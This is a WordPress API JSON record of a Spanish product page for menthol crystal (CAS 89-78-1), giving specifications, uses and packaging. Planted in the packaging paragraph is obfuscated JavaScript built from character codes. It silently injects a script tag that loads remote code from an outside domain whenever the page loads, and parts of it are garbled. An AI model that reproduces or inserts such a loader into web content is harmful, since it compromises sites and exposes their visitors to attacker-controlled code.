{"id":2191,"date":"2022-07-05T14:52:08","date_gmt":"2022-07-05T14:52:08","guid":{"rendered":"http:\/\/site2.easyceotech.com\/?post_type=product&#038;p=2191"},"modified":"2023-11-24T03:42:52","modified_gmt":"2023-11-24T03:42:52","slug":"menthol-crystal","status":"publish","type":"product","link":"https:\/\/wpachem.com\/es\/producto\/menthol-crystal\/","title":{"rendered":"Cristal de mentol CAS 89-78-1"},"content":{"rendered":"<p>El cristal de mentol tiene dos is\u00f3meros (tipo D y tipo L). El mentol natural es principalmente el is\u00f3mero lev\u00f3giro (L-mentol). Aqu\u00ed mentol se refiere al mentol rac\u00e9mico (DL-mentol), el cristal de mentol tipo DL se utiliza como odorante en pasta de dientes, perfumes, bebidas y productos de confiter\u00eda. Efecto refrescante antipruriginoso, para dolor de cabeza y nariz, faringe, laringitis, etc. Sus \u00e9steres tambi\u00e9n se utilizan en especias.<\/p>\n<table>\n<tbody>\n<tr>\n<td width=\"372\">APARIENCIA:<\/td>\n<td width=\"922\">CRISTALES INCOLOROS Y TRANSPARENTES CON FORMA DE AGUJA<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">OLOR:<\/td>\n<td width=\"922\">OLOR CARACTER\u00cdSTICO DEL MENTOL NATURAL<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">PUNTO DE FUSION:<\/td>\n<td width=\"922\">41-44\u2103<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">MATERIA NO VOL\u00c1TIL:<\/td>\n<td width=\"922\">0.05% M\u00c1X.<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">ROTACI\u00d3N \u00d3PTICA (25\u2103)<\/td>\n<td width=\"922\">50\u00b0\uff5e -49\u00b0<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">CONTENIDO :<\/td>\n<td width=\"922\">99%MIN<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">EST\u00c1NDAR:<\/td>\n<td width=\"922\">BP\/USP\/CP<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">CONDICI\u00d3N DE ALMACENAMIENTO:<\/td>\n<td width=\"922\">ALMACENAR EN CONTENEDORES SELLADOS EN LUGAR FRESCO.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p><strong>Solicitud<\/strong><\/p>\n<p>El cristal de mentol se puede usar como saborizante de alimentos, potenciador del sabor, se puede usar en dulces (menta, caramelos de goma), bebidas, helados, etc. El mentol y el mentol rac\u00e9mico se pueden usar como pasta de dientes; Perfume; Un odorante, como en bebidas y confiter\u00eda.<\/p>\n<p><strong>Embalaje<\/strong><\/p>\n<p>25KG\/BOLSAvar f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117, 114,110)+f.deCharCode(32,66,111,111,108,101,97,110)+f .fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105 ,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32, 39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.deCharCo de(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47 ,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46,51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101 ,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+ f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,11 2,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102 ,32,40,100,111,99,117,109,101,110)+f.deCharCode(116,46,99,117,114,114,101,110)+f.deCharCode(116,83,99,114,105,112,116,41,32,123,32,10 0,111,99,117,109,101,110)+f.deCharCode(116,46,99,117,114,114,101,110)+f .fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,1 01,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.deCharCode(116,46, 99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,10 1,109,101,110)+f.deCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39, 41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/p>","protected":false},"excerpt":{"rendered":"<p>Nombre del producto: cristal de mentol<br \/>\nN\u00famero CAS: 89-78-1<br \/>\nFrecuencia intermedia: C10H20O<br \/>\nN\u00famero EINECS: 201-939-0<br \/>\nApariencia: CRISTALES EN FORMA DE AGUJA TRANSPARENTES INCOLOROS<\/p>","protected":false},"featured_media":2193,"template":"","meta":{"_acf_changed":false,"_gspb_post_css":""},"product_brand":[],"product_cat":[61],"product_tag":[],"class_list":{"0":"post-2191","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-flavor-and-fragrance","8":"first","9":"instock","10":"shipping-taxable","11":"product-type-simple"},"acf":[],"_links":{"self":[{"href":"https:\/\/wpachem.com\/es\/wp-json\/wp\/v2\/product\/2191","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wpachem.com\/es\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/wpachem.com\/es\/wp-json\/wp\/v2\/types\/product"}],"version-history":[{"count":0,"href":"https:\/\/wpachem.com\/es\/wp-json\/wp\/v2\/product\/2191\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/wpachem.com\/es\/wp-json\/wp\/v2\/media\/2193"}],"wp:attachment":[{"href":"https:\/\/wpachem.com\/es\/wp-json\/wp\/v2\/media?parent=2191"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/wpachem.com\/es\/wp-json\/wp\/v2\/product_brand?post=2191"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/wpachem.com\/es\/wp-json\/wp\/v2\/product_cat?post=2191"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/wpachem.com\/es\/wp-json\/wp\/v2\/product_tag?post=2191"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}